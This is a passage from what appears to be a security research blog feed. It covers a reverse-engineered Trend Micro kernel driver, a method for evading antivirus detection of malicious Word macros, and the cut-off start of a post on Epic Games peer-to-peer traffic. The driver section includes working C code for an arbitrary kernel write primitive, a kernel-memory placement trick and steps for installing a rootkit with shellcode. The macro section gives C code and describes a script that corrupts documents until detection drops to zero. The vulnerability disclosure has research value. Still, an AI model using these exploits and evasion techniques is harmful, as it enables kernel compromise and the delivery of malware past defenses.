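	return 0;
}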

To make our lives easier, Trend Micro conveniently included a significant amount of debugging strings, often giving an idea of what a function does. Here is a table of the functions I reversed in this sub dispatch table and what they allow us to do.

OperationCode PrimaryRoutine Description
2713h IoControlCreateFile Calls NtCreateFile, all parameters are controlled by the request.
2711h IoControlFindNextFile Returns STATUS_NOT_SUPPORTED.
2710h IoControlFindFirstFile Performs nothing, returns STATUS_SUCCESS always.
2712h IoControlFindCloseFile Calls ZwClose, all parameters are controlled by the request.
2715h IoControlReadFileIRPNoCache References a FileObject using HANDLE from request. Calls IofCallDriver and reads result.
2714h IoControlCreateFileIRP Creates a new FileObject and associates DeviceObject for requested drive.
2716h IoControlDeleteFileIRP Deletes a file by sending an IRP_MJ_SET_INFORMATION request.
2717h IoControlGetFileSizeIRP Queries a file's size by sending an IRP_MJ_QUERY_INFORMATION request.
2718h IoControlSetFilePosIRP Sets a file's position by sending an IRP_MJ_SET_INFORMATION request.
2719h IoControlFindFirstFileIRP Returns STATUS_NOT_SUPPORTED.
271Ah IoControlFindNextFileIRP Returns STATUS_NOT_SUPPORTED.
2720h IoControlQueryFile Calls NtQueryInformationFile, all parameters are controlled by the request.
2721h IoControlSetInformationFile Calls NtSetInformationFile, all parameters are controlled by the request.
2722h IoControlCreateFileOplock Creates an Oplock via IoCreateFileEx and other filesystem API.
2723h IoControlGetFileSecurity Calls NtCreateFile and then ZwQuerySecurityObject. All parameters are controlled by the request.
2724h IoControlSetFileSecurity Calls NtCreateFile and then ZwSetSecurityObject. All parameters are controlled by the request.
2725h IoControlQueryExclusiveHandle Check if a file is opened exclusively.
2726h IoControlCloseExclusiveHandle Forcefully close a file handle.

IoControlCode == 90004027h

Discovery

This dispatch table is primarily used to control the driver's process scanning features. Many functions in this sub dispatch table use a separate scanning thread to synchronously search for processes via various methods both documented and undocumented.

OperationCode PrimaryRoutine Description
C350h GetProcessesAllMethods Find processes via ZwQuerySystemInformation and WorkingSetExpansionLinks.
C351h DeleteTaskResults* Delete results obtained through other functions like GetProcessesAllMethods.
C358h GetTaskBasicResults* Further parse results obtained through other functions like GetProcessesAllMethods.
C35Dh GetTaskFullResults* Completely parse results obtained through other functions like GetProcessesAllMethods.
C360h IsSupportedSystem Returns TRUE if the system is "supported" (whether or not they have hardcoded offsets for your build).
C361h TryToStopTmComm Attempt to stop the driver.
C362h GetProcessesViaMethod Find processes via a specified method.
C371h CheckDeviceStackIntegrity Check for tampering on devices associated with physical drives.
C375h ShouldRequireOplock Returns TRUE if oplocks should be used for certain scans.

These IOCTLs revolve around a few structures I call "MicroTask" and "MicroScan". Here are the structures reverse-engineered:

struct MicroTaskVtable
{
	PVOID Constructor;
	PVOID NewNode;
	PVOID DeleteNode;
	PVOID Insert;
	PVOID InsertAfter;
	PVOID InsertBefore;
	PVOID First;
	PVOID Next;
	PVOID Remove;
	PVOID RemoveHead;
	PVOID RemoveTail;
	PVOID unk2;
	PVOID IsEmpty;
};

struct MicroTask
{
	MicroTaskVtable* vtable;
	PVOID self1; // ptr to itself.
	PVOID self2; // ptr to itself.
	DWORD_PTR unk1;
	PVOID MemoryAllocator;
	PVOID CurrentListItem;
	PVOID PreviousListItem;
	DWORD ListSize;
	DWORD unk4; // Initialized as NULL.
	char ListName[50];
};

struct MicroScanVtable
{
	PVOID Constructor;
	PVOID GetTask;
};

struct MicroScan
{
	MicroScanVtable* vtable;
	DWORD Tag; // Always 'PANS'.
	char pad1[4];
	DWORD64 TasksSize;
	MicroTask Tasks[4];
};

For most of the IOCTLs in this sub dispatch table, a MicroScan instance is passed in by the client for the driver to populate. We'll look into how we can abuse this trust in the next section.

Exploitation

When I was initially reverse engineering the functions in this sub dispatch table, I was quite confused because the code "didn't seem right". It appeared that the MicroScan kernel pointer returned by functions such as GetProcessesAllMethods was passed back by the client to other functions such as DeleteTaskResults. These functions would then take this untrusted kernel pointer and, with almost no validation, call functions in the virtual function table specified at the base of the class.


Taking a look at the "validation routine" for the DeleteTaskResults sub dispatch table entry, the only validation performed on the MicroScan instance specified at the input buffer + 0x10 was making sure it was a valid kernel address.


The only other check besides making sure that the supplied pointer was in kernel memory was a simple check in DeleteTaskResults to make sure the Tag member of the MicroScan is PANS.


Since DeleteTaskResults calls the constructor specified in the virtual function table of the MicroScan instance, to call an arbitrary kernel function we need to:

  1. Be able to allocate at least 10 bytes of kernel memory (for vtable and tag).
  2. Control the allocated kernel memory to set the virtual function table pointer and the tag.
  3. Be able to determine the address of this kernel memory from user-mode.

Fortunately, a mentor of mine, Alex Ionescu, pointed me in the right direction when it comes to allocating and controlling kernel memory from user-mode. A 2010 issue of HackInTheBox Magazine had an article by Mateusz Jurczyk called "Reserve Objects in Windows 7". The article discussed using APC Reserve Objects, introduced in Windows 7, to allocate controllable kernel memory from user-mode. The general idea is that you queue an APC to an APC Reserve Object with the ApcRoutine and ApcArgumentX members set to the data you want in kernel memory, and then use NtQuerySystemInformation to find the Reserve Object in kernel memory. The reserve object will contain the previously specified KAPC members contiguously, allowing a user-mode application to control up to 32 bytes of kernel memory (on 64-bit) and know the location of that memory. I strongly suggest reading the article if you'd like to learn more.
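
Here is a rough user-mode sketch of the trick. NtAllocateReserveObject and NtQueueApcThreadEx are undocumented, so the prototypes and the reserve object type value below come from public research; error handling is omitted and the program must link against ntdll:

#include <windows.h>
#include <winternl.h>
#include <stdlib.h>

#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define SystemExtendedHandleInformation 64
#define MemoryReserveObjectTypeUserApc 0

typedef NTSTATUS (NTAPI *NtAllocateReserveObject_t)(PHANDLE ReserveHandle,
	POBJECT_ATTRIBUTES ObjectAttributes, ULONG ObjectType);
typedef NTSTATUS (NTAPI *NtQueueApcThreadEx_t)(HANDLE ThreadHandle,
	HANDLE ReserveHandle, PVOID ApcRoutine, PVOID Arg1, PVOID Arg2, PVOID Arg3);

typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX
{
	PVOID Object;
	ULONG_PTR UniqueProcessId;
	ULONG_PTR HandleValue;
	ULONG GrantedAccess;
	USHORT CreatorBackTraceIndex;
	USHORT ObjectTypeIndex;
	ULONG HandleAttributes;
	ULONG Reserved;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;

typedef struct _SYSTEM_HANDLE_INFORMATION_EX
{
	ULONG_PTR NumberOfHandles;
	ULONG_PTR Reserved;
	SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
} SYSTEM_HANDLE_INFORMATION_EX;

// Queue four controlled pointer-sized values into a reserve object's KAPC and
// return the kernel address of the reserve object. The controlled values live
// at a fixed (build-dependent) offset inside that object.
PVOID AllocateControlledKernelMemory(PVOID Val0, PVOID Val1, PVOID Val2, PVOID Val3)
{
	HMODULE ntdll = GetModuleHandleW(L"ntdll.dll");
	NtAllocateReserveObject_t pNtAllocateReserveObject = (NtAllocateReserveObject_t)
		GetProcAddress(ntdll, "NtAllocateReserveObject");
	NtQueueApcThreadEx_t pNtQueueApcThreadEx = (NtQueueApcThreadEx_t)
		GetProcAddress(ntdll, "NtQueueApcThreadEx");

	HANDLE reserve = NULL;
	pNtAllocateReserveObject(&reserve, NULL, MemoryReserveObjectTypeUserApc);

	// The ApcRoutine and its three arguments become adjacent values in the
	// KAPC. Queue to a thread that will not go alertable so the KAPC (and
	// our data) stays resident.
	pNtQueueApcThreadEx(GetCurrentThread(), reserve, Val0, Val1, Val2, Val3);

	// Locate the reserve object in kernel memory by matching our handle.
	ULONG size = 0x100000;
	SYSTEM_HANDLE_INFORMATION_EX *info = NULL;
	NTSTATUS status;
	do
	{
		free(info);
		info = (SYSTEM_HANDLE_INFORMATION_EX*)malloc(size);
		status = NtQuerySystemInformation(
			(SYSTEM_INFORMATION_CLASS)SystemExtendedHandleInformation,
			info, size, NULL);
		size *= 2;
	} while (status == STATUS_INFO_LENGTH_MISMATCH);

	for (ULONG_PTR i = 0; i < info->NumberOfHandles; i++)
		if (info->Handles[i].UniqueProcessId == GetCurrentProcessId() &&
		    info->Handles[i].HandleValue == (ULONG_PTR)reserve)
			return info->Handles[i].Object;

	return NULL;
}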

This trick still works in Windows 10, meaning we're able to meet all three requirements. By using an Apc Reserve Object, we can allocate at least 10 bytes for the MicroScan structure and bypass the inadequate checks completely. The result? The ability to call arbitrary kernel pointers:

[Screenshot: proof-of-concept calling an arbitrary kernel pointer]

Although I provided a specific example of vulnerable code in DeleteTaskResults, any of the functions I marked in the table with asterisks are vulnerable. They all trust the kernel pointer specified by the untrusted client and end up calling a function in the MicroScan instance's virtual function table.

IoControlCode == 90004033h

Discovery

This next sub dispatch table primarily manages the TrueApi class we reviewed before.

OperationCode PrimaryRoutine Description
EA60h IoControlGetTrueAPIPointer Retrieve pointers of functions in the TrueApi class.
EA61h IoControlGetUtilityAPIPointer Retrieve pointers of utility functions of the driver.
EA62h IoControlRegisterUnloadNotify* Register a function to be called on unload.
EA63h IoControlUnRegisterUnloadNotify Unload a previously registered unload function.

Exploitation

IoControlRegisterUnloadNotify

This function caught my eye the moment I saw its name in a debug string. Using this sub dispatch table function, an untrusted client can register up to 16 arbitrary "unload routines" that get called when the driver unloads. This function's validator routine checks this pointer from the untrusted client buffer for validity. If the caller is from user-mode, the validator calls ProbeForRead on the untrusted pointer. If the caller is from kernel-mode, the validator checks that it is a valid kernel memory address.

This function cannot immediately be used in an exploit from user-mode. The problem is that if we're a user-mode caller, we must provide a user-mode pointer, because the validator routine uses ProbeForRead. When the driver unloads, this user-mode pointer gets called, but it won't do much because of mitigations such as SMEP. I'll reference this function in a later section, but it is genuinely scary to see an untrusted user-mode client being able to direct a driver to call an arbitrary pointer by design.

IoControlCode == 900040DFh

This sub dispatch table is used to interact with the XrayApi. Although the Xray Api is generally used by scans implemented in the kernel, this sub dispatch table provides limited access for the client to interact with physical drives.

OperationCode PrimaryRoutine Description
15F90h IoControlReadFile Read a file directly from a disk.
15F91h IoControlUpdateCoreList Update the kernel pointers used by the Xray Api.
15F92h IoControlGetDRxMapTable Get a table of drives mapped to their corresponding devices.

IoControlCode == 900040E7h

Discovery

The final sub dispatch table is used to scan for hooks in a variety of system structures. It was interesting to see the variety of hooks Trend Micro checks for, including hooks in object types, major function tables, and even inline function hooks.

OperationCode PrimaryRoutine Description
186A0h TMXMSCheckSystemRoutine Check a few system routines for hooks.
186A1h TMXMSCheckSystemFileIO Check file IO major functions for hooks.
186A2h TMXMSCheckSpecialSystemHooking Check the file object type and ntoskrnl Io functions for hooks.
186A3h TMXMSCheckGeneralSystemHooking Check the Io manager for hooks.
186A4h TMXMSCheckSystemObjectByName Recursively trace a system object (either a directory or symlink).
186A5h TMXMSCheckSystemObjectByName2* Copy a system object into user-mode memory.

Exploitation

Yeah, TMXMSCheckSystemObjectByName2 is as bad as it sounds. Before looking at the function directly, here are a few reverse-engineered structures used later:

struct CheckSystemObjectParams
{
    PVOID Src;
    PVOID Dst;
    DWORD Size;
    DWORD* OutSize;
};

struct TXMSParams
{
    DWORD OutStatus;
    DWORD HandlerID;
    CHAR unk[0x38];
    CheckSystemObjectParams* CheckParams;
};

TMXMSCheckSystemObjectByName2 takes in a Source pointer, Destination pointer, and a Size in bytes. The validator function called for TMXMSCheckSystemObjectByName2 checks the following:

  • ProbeForRead on the CheckParams member of the TXMSParams structure.
  • ProbeForRead and ProbeForWrite on the Dst member of the CheckSystemObjectParams structure.

Essentially, this means that we need to pass a valid CheckParams structure and that the Dst pointer we pass must be in user-mode memory. Now let's look at the function itself:

[Screenshot: decompilation of TMXMSCheckSystemObjectByName2]

Although that for loop may seem scary, all it is doing is checking a range of kernel memory in an optimized way. For every memory page in the range Src to Src + Size, the function calls MmIsAddressValid. The real scary part is the following operations:

[Screenshot: the unchecked memmove and OutSize operations]

These lines take an untrusted Src pointer and copy Size bytes to the untrusted Dst pointer... yikes. We can use the memmove operations to read an arbitrary kernel pointer, but what about writing to one? The problem is that the validator for TMXMSCheckSystemObjectByName2 requires that the destination be user-mode memory. Fortunately, there is another bug in the code.

The next *params->OutSize = Size; line takes the Size member from our structure and writes it to the pointer specified by the untrusted OutSize member. No verification is done on what OutSize points to, so we can write up to a DWORD with each IOCTL call. One caveat is that the Src pointer must point to valid kernel memory for up to Size bytes. To meet this requirement, I just passed the base of the ntoskrnl module as the source.
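
Here is a sketch of that write primitive using the structures reversed above. The device handle and ntoskrnl base are placeholders the attacker must supply, and the exact request layout (where the 186A5h operation code sits relative to TXMSParams) is simplified:

// One arbitrary DWORD write per IOCTL: the driver performs
// "*params->OutSize = Size" with no check on where OutSize points.
VOID WriteKernelDword(HANDLE device, PVOID ntoskrnlBase, DWORD *kernelAddress, DWORD value)
{
	// Dst must be user-mode and writable for 'value' bytes, because the
	// driver also memmoves Size bytes into it. This bounds a single write
	// by how much valid kernel memory Src spans.
	PVOID scratch = VirtualAlloc(NULL, value, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

	CheckSystemObjectParams check = { 0 };
	check.Src = ntoskrnlBase;      // readable kernel memory, >= 'value' bytes
	check.Dst = scratch;           // satisfies ProbeForRead/ProbeForWrite
	check.Size = value;            // doubles as the DWORD written to *OutSize
	check.OutSize = kernelAddress; // unchecked kernel pointer: the actual write

	TXMSParams params = { 0 };
	params.CheckParams = &check;

	DWORD bytesReturned = 0;
	DeviceIoControl(device, 0x900040E7, &params, sizeof(params),
		&params, sizeof(params), &bytesReturned, NULL);

	VirtualFree(scratch, 0, MEM_RELEASE);
}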

Using this arbitrary write primitive, we can use the previously found unload routines trick to execute code. Although the validator routine prevents us from passing in a kernel pointer if we're calling from user-mode, we don't actually need to go through the validator. Instead, we can write to the unload routine array inside of the driver's .data section using our write primitive and place the pointer we want.

Really, really bad code

Typically, I like sticking to strictly security in my blog posts, but this driver made me break that tradition. In this section, we won't be covering the security issues of the driver, rather the terrible code that's used by millions of Trend Micro customers around the world.

Bruteforcing Processes

[Screenshot: decompilation of the process bruteforcing loop]

Let's take a look at what's happening here. This function loops from 0 to 0x10000 in increments of 4, treating each index as a PID and retrieving the process object behind it (if there is one). If the index matches a process, the function checks whether the name of the process is csrss.exe. If it is, the final check is that the session ID of the process is 0. Come on guys, there is literally a documented API to enumerate processes from the kernel... what's the point of bruteforcing?
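
For contrast, here is a minimal sketch of the documented approach from kernel-mode. SystemProcessInformation is information class 5, the SYSTEM_PROCESS_INFORMATION layout comes from the public headers, and error handling is kept minimal:

// Enumerate processes the documented way and look for csrss.exe in session 0.
VOID FindCsrssDocumented(VOID)
{
	ULONG size = 0;
	ZwQuerySystemInformation(SystemProcessInformation, NULL, 0, &size);
	size += 0x1000; // slack in case the process list grows between calls

	PSYSTEM_PROCESS_INFORMATION processes =
		(PSYSTEM_PROCESS_INFORMATION)ExAllocatePoolWithTag(PagedPool, size, 'corP');
	if (!NT_SUCCESS(ZwQuerySystemInformation(SystemProcessInformation, processes, size, &size)))
	{
		ExFreePoolWithTag(processes, 'corP');
		return;
	}

	UNICODE_STRING csrss = RTL_CONSTANT_STRING(L"csrss.exe");
	for (PSYSTEM_PROCESS_INFORMATION entry = processes; ;
	     entry = (PSYSTEM_PROCESS_INFORMATION)((PUCHAR)entry + entry->NextEntryOffset))
	{
		if (RtlEqualUnicodeString(&entry->ImageName, &csrss, TRUE) && entry->SessionId == 0)
		{
			// Found it; no PID bruteforcing required.
			break;
		}
		if (entry->NextEntryOffset == 0)
			break;
	}

	ExFreePoolWithTag(processes, 'corP');
}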

Bruteforcing Offsets

EPROCESS ImageFileName Offset

[Screenshot: decompilation of the ImageFileName offset bruteforce]

When I first saw this code, I wasn't sure what I was looking at. The function takes the current process, which happens to be the System process since this is called from a system thread, then searches for the string "System" in the first 0x1000 bytes. What's happening is... Trend Micro is bruteforcing the ImageFileName member of the EPROCESS structure by looking for the known name of the System process inside its own EPROCESS structure. If you want the ImageFileName of a process, just use ZwQueryInformationProcess with the ProcessImageFileName class...
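
For reference, the documented route is a single call; ProcessImageFileName is information class 27 and returns a UNICODE_STRING followed by its buffer (a fragment, error handling omitted):

// Inside some kernel routine, given an opened process handle:
UCHAR buffer[sizeof(UNICODE_STRING) + 0x200];
ULONG returnedLength = 0;
ZwQueryInformationProcess(processHandle, ProcessImageFileName,
	buffer, sizeof(buffer), &returnedLength);
PUNICODE_STRING imageName = (PUNICODE_STRING)buffer;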

EPROCESS Peb Offset

[Screenshot: decompilation of the Peb offset bruteforce]

In this function, Trend Micro uses the PID of the csrss process to bruteforce the Peb member of the EPROCESS structure. The function retrieves the EPROCESS object of the csrss process using PsLookupProcessByProcessId and retrieves the PebBaseAddress using ZwQueryInformationProcess. Using those pointers, it tries every offset from 0 to 0x2000 until one matches the known Peb pointer. What's the point of finding the offset of the Peb member when you can just use ZwQueryInformationProcess, as you already do...

ETHREAD StartAddress Offset

[Screenshot: decompilation of the StartAddress offset bruteforce]

Here Trend Micro uses the current system thread, whose start address is known, to bruteforce the StartAddress member of the ETHREAD structure. Another case where finding the raw offset is unnecessary: there is a semi-documented class of ZwQueryInformationThread called ThreadQuerySetWin32StartAddress which gives you the start address of a thread.
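
A sketch of that approach; the class value is 9, and ZwQueryInformationThread is exported by ntoskrnl even though the class itself is only semi-documented:

// Inside some kernel routine, given an opened thread handle:
PVOID startAddress = NULL;
ZwQueryInformationThread(threadHandle,
	(THREADINFOCLASS)9 /* ThreadQuerySetWin32StartAddress */,
	&startAddress, sizeof(startAddress), NULL);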

Unoptimized Garbage

[Screenshot: decompilation of the TrueApi zeroing function]

When I initially decompiled this function, I thought IDA Pro might be simplifying a memset operation, because all this function was doing was setting all of the TrueApi structure members to zero. I decided to take a peek at the assembly to confirm I wasn't missing something...

[Screenshot: the corresponding unoptimized assembly]

Yikes... looks like someone turned off optimizations.

Cheating Microsoft's WHQL Certification

So far we've covered methods to read and write arbitrary kernel memory, but there is one step missing to install our own rootkit. Although you could execute kernel shellcode with just a read/write primitive, I generally like finding the path of least resistance. Since this is a third-party driver, chances are, there is some NonPagedPool memory allocated which we can use to host and execute our malicious shellcode.

Let's take a look at how Trend Micro allocates memory. Early in the entrypoint of the driver, Trend Micro checks if the machine is a "supported system" by checking the major version, minor version, and the build number of the operating system. Trend Micro does this because they hardcode several offsets which can change between builds.

Fortunately, the PoolType global variable which is used to allocate non-paged memory is set to 0 (NonPagedPool) by default. I noticed that although this value was 0 initially, the variable was still in the .data section, meaning it could be changed. When I looked at what wrote to the variable, I saw that the same function responsible for checking the operating system's version also set this PoolType variable in certain cases.

[Screenshot: decompilation of the version check that sets PoolType]

From a brief glance, it looks like the driver prefers NonPagedPoolNx if the operating system is Windows 10 or newer. Good from a security standpoint, but bad for us. This PoolType is used for all non-paged allocations, meaning we would have to find a spare ExAllocatePoolWithTag with a hardcoded NonPagedPool argument, otherwise we couldn't use the driver's allocated memory on Windows 10. But it's not that straightforward. What about MysteriousCheck(), the second requirement of this if statement?

[Screenshot: decompilation of MysteriousCheck]

What MysteriousCheck() was doing was checking whether Microsoft's Driver Verifier was enabled... Instead of just using NonPagedPoolNx on Windows 8 or higher, Trend Micro placed an explicit check to only use secure memory allocations while they're being watched. Why is this not just another example of bad code? Because Trend Micro's driver is WHQL certified:

[Screenshot: the driver's WHQL certification]

Passing Driver Verifier has been a long-time requirement for obtaining WHQL certification. On Windows 10, Driver Verifier enforces that drivers do not allocate executable memory. Instead of complying with this requirement designed to secure Windows users, Trend Micro decided to ignore their users' security and designed their driver to cheat any testing or debugging environment that would catch such violations.

Honestly, I'm dumbfounded. I don't understand why Trend Micro would go out of their way to cheat in these tests. Trend Micro could have just kept the Windows 10 check; why bother creating an explicit check for Driver Verifier? The only working theory I have is that, for some reason, most of their driver is not compatible with NonPagedPoolNx and only their entrypoint is, otherwise there really isn't a point.

Delivering on my promise

As I promised, you can use Trend Micro's driver to install your own rootkit. Here is what you need to do:

  1. Find any NonPagedPool allocation by the driver. As long as you don't have Driver Verifier running, you can use any of the non-paged allocations that have their pointers stored in the .data section. Preferably, pick an allocation that isn't used often.
  2. Write your kernel shellcode anywhere in the memory allocation using the arbitrary kernel write primitive in TMXMSCheckSystemObjectByName2.
  3. Execute your shellcode by registering an unload routine (directly in .data) or using the several other execution methods present in the 90004027h dispatch table.

It's really as simple as that.

Conclusion

I reverse a lot of drivers and you do typically see some pretty dumb stuff, but I was shocked that many of the findings in this article came from a company such as Trend Micro. Most of the driver feels like proof-of-concept garbage that is held together by duct tape.

Although Trend Micro has taken basic precautionary measures such as restricting who can talk to their driver, a significant amount of the code inside the IOCTL handlers performs very risky DKOM. I'm also not sure how practices like bruteforcing would make it through an adequate code review process. For example, the process bruteforcing code makes no sense; are Trend Micro's developers not aware that they can enumerate processes via ZwQuerySystemInformation? And what about the disabled optimizations? Anti-virus already gets flak for slowing down client machines, so why intentionally make your driver slower? To add insult to injury, this driver is used in several Trend Micro products, not just their rootkit remover. All I know going forward is that I won't be a Trend Micro customer anytime soon.

Defeating Macro Document Static Analysis with Pictures of My Cat

16 September 2020 at 11:33

Over the past few weeks I've spent some time learning Visual Basic for Applications (VBA), specifically for creating malicious Word documents to act as an initial stager. When taking operational security into consideration and brainstorming ways of evading macro detection, I had the question, how does anti-virus detect a malicious macro?

The hypothesis I came up with was that anti-virus would parse out macro content from the Word document and scan the macro code for a variety of malicious techniques; nothing crazy. A common way I've seen attackers counter this sort of detection is macro obfuscation, which is effectively scrambling macro content in an attempt to evade the malicious patterns anti-virus looks for.

The questions I wanted answered were:

  1. How does anti-virus even retrieve the macro content?
  2. What differences are there between how Microsoft Word and anti-virus retrieve macro content?

Discovery

According to Wikipedia, Office Open XML (OOXML) "is a zipped, XML-based file format developed by Microsoft for representing spreadsheets, charts, presentations and word processing documents". This is the file format used for the common Microsoft Word extensions docx and docm. The fact that Microsoft Office documents are essentially a zip file of XML files certainly piqued my interest.

Since the OOXML format is just a ZIP file, I found that parsing macro content from a Microsoft Word document is simpler than you might expect. All an anti-virus would need to do is:

  1. Extract the Microsoft Office document as a ZIP and look for the file word\vbaProject.bin.
  2. Parse the OLE binary and extract the macro content.

The difference I was interested in was how each implementation handles errors and corruption. For example, common implementations of ZIP extraction often have error checks such as:

  1. Does the local file header begin with the signature 0x04034b50?
  2. Is the minimum version bytes greater than what is supported?

What I was really after was finding ways to break the ZIP parser in anti-virus without breaking the ZIP parser used by Microsoft Office.

Before we get into corrupting anything, we need a base sample. As an example, I wrote a basic macro that would display "Hello World!" when the document was opened.


For the purposes of testing macro detection, I needed another sample document that was heavily detected by anti-virus. After a quick Google search, I found a few samples shared by @malware_traffic here. The sample named HSOTN2JI.docm had the highest detection rate, coming in at 44/61 engines marking the document as malicious.


To ensure that detections were specifically based on the malicious macro inside the document's vbaProject.bin OLE file, I...

  1. Opened both my "Hello World" and the HSOTN2JI macro documents as ZIP files.
  2. Replaced the vbaProject.bin OLE file in my "Hello World" macro document with the vbaProject.bin from the malicious HSOTN2JI macro document.

Running the scan again resulted in the following detection rate:

[Screenshot: VirusTotal detection results]

Fortunately, these anti-virus products were detecting the actual macro and not solely relying on conventional methods such as blacklisting the hash of the document. Now with a base malicious sample, we can begin tampering with the document.

Exploitation

The methodology I used for the methods of corruption is:

  1. Modify the original base sample file with the corruption method.
  2. Verify that the document still opens in Microsoft Word.
  3. Upload the new document to VirusTotal.
  4. If good results, retry the method on my original "Hello World" macro document and verify that the macro still works.

Before continuing, it's important to note that the methods discussed in this blog post do come with drawbacks, specifically:

  1. Whenever a victim opens a corrupted document, they will receive a prompt asking whether or not they'd like to recover the document.
  2. Before the macro is executed, the victim will be prompted to save the recovered document. Once the victim has saved the recovered document, the macro will execute.

Although adding any user interaction certainly increases the complexity of the attack, if a victim was going to enable macros anyway, they'd probably also be willing to recover the document.

General Corruption

We'll first start with the effects of general corruption on a Microsoft Word document. By this I mean corrupting the file using methods that are not specific to the ZIP file format.

First, let's observe the impact of adding random bytes to the beginning of the file.

[Screenshots: the modified document and its VirusTotal results]

With a few bytes at the beginning of the document, we were able to decrease detection by about 33%. This made me confident that future attempts could reduce this even further.

Result: 33% decrease in detection

Prepending My Cat

This time, let's do the same thing except prepend a JPG file, in this case, a photo of my cat!


You might think that prepending random data would result in the same detection rate as prepending an image, but some anti-virus engines marked the file as clean as soon as they saw an image.


To aid in future research, the anti-virus engines that marked the random data document as malicious but did not mark the cat document as malicious were:

Ad-Aware
ALYac
DrWeb
eScan
McAfee
Microsoft
Panda
Qihoo-360
Sophos ML
Tencent
VBA32

The reason this list is larger than the actual difference in detection is that some engines strangely detected the cat document but did not detect the random data document.

Result: 50% decrease in detection

Prepending + Appending My Cat

Purely appending data to the end of a macro document barely impacts the detection rate; instead, we'll combine appending data with other methods, starting with my cat.
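
The corruption step itself is trivial; here is a sketch in C with placeholder file names:

#include <stdio.h>

// Append the contents of 'path' to the already-open output file.
static void append_file(FILE *out, const char *path)
{
	FILE *in = fopen(path, "rb");
	char chunk[4096];
	size_t bytes;
	while ((bytes = fread(chunk, 1, sizeof(chunk), in)) > 0)
		fwrite(chunk, 1, bytes, out);
	fclose(in);
}

int main(void)
{
	FILE *out = fopen("patched.docm", "wb");
	append_file(out, "cat.jpg");       // prepended image
	append_file(out, "document.docm"); // the original macro document
	append_file(out, "cat.jpg");       // appended image
	fclose(out);
	return 0;
}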


What was shocking about all of this was that even when the ZIP file was sandwiched between two images, Microsoft's parser was able to reliably recover the document and macro! With only extremely basic modifications to the document, we were able to prevent most detection of the macro.

Result: 88% decrease in detection

Zip Corruption

Microsoft's fantastic document recovery is not just exclusive to general methods of file corruption. Let's take a look at how it handles corruption specific to the ZIP file format.

Corrupting the ZIP Local File Header

The only file we care about preventing access to is the vbaProject.bin file, which contains the malicious macro. Without corrupting the data, could we corrupt the file header for the vbaProject.bin file and still have Microsoft Word recognize the macro document?

Let's take a look at the structure of a local file header from Wikipedia:

[Diagram: ZIP local file header layout]

I decided that the local file header signature would be the field least likely to break file parsing, hoping that Microsoft Word didn't care whether the file header had the correct magic value. If Microsoft Word didn't care about the magic, corrupting it had a high chance of breaking ZIP parsers that perform integrity checks such as verifying the magic value.
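
Here is a sketch of that corruption in C. It scans for local file headers, matches the one whose name is word/vbaProject.bin (ZIP archives store forward slashes), and overwrites only the 4-byte signature; the name length sits at header offset 26 and the name itself at offset 30:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void)
{
	FILE *f = fopen("document.docm", "rb+");
	fseek(f, 0, SEEK_END);
	long size = ftell(f);
	fseek(f, 0, SEEK_SET);

	unsigned char *data = (unsigned char*)malloc(size);
	fread(data, 1, size, f);

	const char *target = "word/vbaProject.bin";
	long targetLen = (long)strlen(target);

	for (long i = 0; i + 30 + targetLen <= size; i++)
	{
		// Local file header signature: 50 4B 03 04 ("PK\x03\x04").
		if (memcmp(data + i, "PK\x03\x04", 4) != 0)
			continue;

		unsigned short nameLen = (unsigned short)(data[i + 26] | (data[i + 27] << 8));
		if (nameLen == targetLen && memcmp(data + i + 30, target, targetLen) == 0)
		{
			// Corrupt only the signature; the macro data stays intact.
			fseek(f, i, SEEK_SET);
			fwrite("\xDE\xAD\xBE\xEF", 1, 4, f);
			break;
		}
	}

	fclose(f);
	free(data);
	return 0;
}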

After corrupting only the file header signature of the vbaProject.bin file entry, we get the following result:

[Screenshots: the corrupted header and VirusTotal results]

With a ZIP specific corruption method, we almost completely eliminated detection.

Result: 90% decrease in detection

Combining Methods

With all of these methods, we've been able to reduce static detection of malicious macro documents quite a bit, but it's still not 100%. Could these methods be combined to achieve even lower rates of detection? Fortunately, yes!

Method Detection Rate Decrease
Prepending Random Bytes 33%
Prepending an Image 50%
Prepending and Appending an Image 88%
Corrupting ZIP File Header 90%
Prepending/Appending Image and Corrupting ZIP File Header 100%

Interested in trying out the last corruption method, which reduced detection by 100%? I made a script to do just that! To use it, simply execute the script providing the document filename as the first argument and a picture filename as the second. The script will write the patched document to your current directory.

As stated before, even though these methods can bring the detection of a macro document down to 0%, they come at a high cost to attack complexity. A victim will not only need to click to recover the document, but will also need to save the recovered document before the malicious macro executes. Whether or not that added complexity is worth it for your team will largely depend on the environment you're up against.

Regardless, one must applaud the team working on Microsoft Office, especially those who designed the fantastic document recovery functionality. Even compared to tools specifically designed to recover ZIP files, the recovery capability in Microsoft Office exceeds all expectations.

Insecure by Design, Epic Games Peer-to-Peer Multiplayer Service

17 December 2020 at 16:07

The opinions expressed in this publication are those of the author and do not reflect the opinions or views of my employer. All research was conducted independently.

As someone who enjoys games that involve logistics, a recently-released game caught my eye. That game was Satisfactory, which is all about building up a massive factory on an alien planet from nothing. Since I loved my time with Factorio, another logistics-oriented game, Satisfactory seemed like a perfect fit!

Satisfactory had a unique feature that I rarely see in games today: peer-to-peer multiplayer sessions! Generally speaking, most games take the client-server approach, with dedicated servers serving multiple clients, instead of the peer-to-peer model where clients serve each other.

I was curious to see how it worked under the hood. As a security researcher, one of my number one priorities is to always "stay curious" with anything I interact with. This was a perfect opportunity to exercise that curiosity!

Introduction

When analyzing the communication of any application, a great place to start is attempting to intercept its HTTP traffic. Often, applications won't use an overly complicated protocol if they don't need to, and web requests happen to be one of the most common ways of communicating. To intercept both plaintext and encrypted traffic, I used Fiddler by Telerik, which features a simple-to-use interface for intercepting HTTP(S) traffic. Fiddler took care of automatically installing the root certificate it uses to issue certificates for websites, but the question was whether Satisfactory used a platform with certificate pinning. Only one way to find out!

[Screenshot: Fiddler capture of Satisfactory's traffic]

Lucky for us, the game did not have any certificate pinning mechanism. The first two requests appeared to query the latest game news from Coffee Stain Studios, the creators of Satisfactory. I was sad to see that these requests were performed over HTTP, but fortunately they did not contain sensitive information.

Taking a look at the other requests revealed that Satisfactory was authenticating with Epic Games. Perhaps they were using an Epic Games service for their multiplayer platform?

[Screenshot: request to the Epic Games API with EOS headers]

